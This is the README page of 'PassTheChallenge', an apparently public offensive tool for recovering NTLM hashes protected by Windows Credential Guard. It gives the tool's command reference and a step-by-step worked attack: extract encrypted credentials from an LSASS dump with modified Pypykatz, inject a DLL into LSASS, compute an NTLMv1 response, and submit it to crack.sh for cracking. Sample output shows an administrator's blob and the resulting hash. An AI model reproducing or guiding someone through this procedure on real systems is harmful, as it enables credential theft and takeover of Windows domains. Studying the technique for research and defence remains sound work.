Skip to content

ly4k/PassTheChallenge

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PassTheChallenge

Recovering NTLM hashes from Credential Guard. Read more about the techniques here.

Usage

Releases can be found here.

Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

Usage: <command> [<parameters...>]

Commands:
    inject - Inject module and start PtC-RPC server inside LSASS
    ping - Ping the PtC-RPC server inside LSASS
    challenge - Calculate NTLMv2 Response using encrypted credentials
      <addresses> - <context handle>:<proxy info>
      <encrypted blob> - <HEX>
      <server challenge> - <UTF16_HEX domain>:<UTF16_HEX username>:<HEX server name>:<HEX server challenge>
    nthash - Calculate NTLMv1 Response using encrypted credentials
      <addresses> - <context handle>:<proxy info>
      <encrypted blob> - <HEX>
      [<server challenge>] - If omitted, a static challenge of 1122334455667788 will be used
    protect - Convert NT hash to encrypted blob
      <addresses> - <context handle>:<proxy info>
      <nt hash> - <HEX>
    compare - Compare two encrypted blobs or an encrypted blob with a NT hash
      <addresses> - <context handle>:<proxy info>
      <encrypted blob> - <HEX>
      <encrypted blob/NT hash> - <HEX>

Examples:
    PtC.exe inject [<module>]
    PtC.exe ping
    PtC.exe challenge 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...] 6c0079[...]:610064[...]:020008[...]:66a98b[...]
    PtC.exe nthash 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...]
    PtC.exe protect 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...]
    PtC.exe compare 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...] 66a98b[...]

Examples

First, use the modified version of Pypykatz to extract the encrypted credentials, along with the "Context Handle" and "Proxy Info" from an LSASS memory dump.

> python3 -m pypykatz lsa minidump lsass.DMP -p msv
[...]
luid 194748
        == MSV ==
                Username: Administrator
                Domain: corp
                        [LSA Isolated Data]
                        Is NT Present: True
                        Context Handle: 0x1b6d5216c60
                        Proxy Info: 0x7ffdd8bfd380
                        Encrypted blob: a0000000000000000800000064000000010000000101000001000000366f55058c45738be16ab11f1d78586f2649f0c348b3171496cd7ef39dd4f3bb3dfda4ea33fb46d407887a570b1d545d0100000000000000000000000000000001000000340000004e746c6d48617368256a784d729f032326c6f16b07ebbd279dab88912c12e9b7f8b16e3a5ccdce5f70b65eef248cf38faf856a9793cba54c7f8bf4ef
                DPAPI: c02c86e371103ad7d7d352b19af1a74a00000000
[...]

Then inject the SecurityPackage.dll module into the LSASS process. Make sure that SecurityPackage.dll is located in your current working directory, or specify an alternative path as the first parameter.

> .\PassTheChallenge.exe inject <[path to module]>
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

[+] Package seems to be loaded

The easy way to retrieve the NTLM hash is by using the nthash command, as shown below using the values from the Pypykatz dump.

> .\PassTheChallenge.exe nthash 0x1b6d5216c60:0x7ffdd8bfd380 a0000000000000000800000064000000010000000101000001000000366f55058c45738be16ab11f1d78586f2649f0c348b3171496cd7ef39dd4f3bb3dfda4ea33fb46d407887a570b1d545d0100000000000000000000000000000001000000340000004e746c6d48617368256a784d729f032326c6f16b07ebbd279dab88912c12e9b7f8b16e3a5ccdce5f70b65eef248cf38faf856a9793cba54c7f8bf4ef
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

[+] Server is alive
[+] Response:

NTHASH:0F2FBBD336C44CB24E5189483F77378135F02C79D225B1AC

Finally, submit the NTHASH for free to crack.sh and wait around 30 seconds for your NTLM hash to be recovered.

See the blog post for more details.

About

Recovering NTLM hashes from Credential Guard

Resources

License

Stars

Watchers

Forks

Packages

No packages published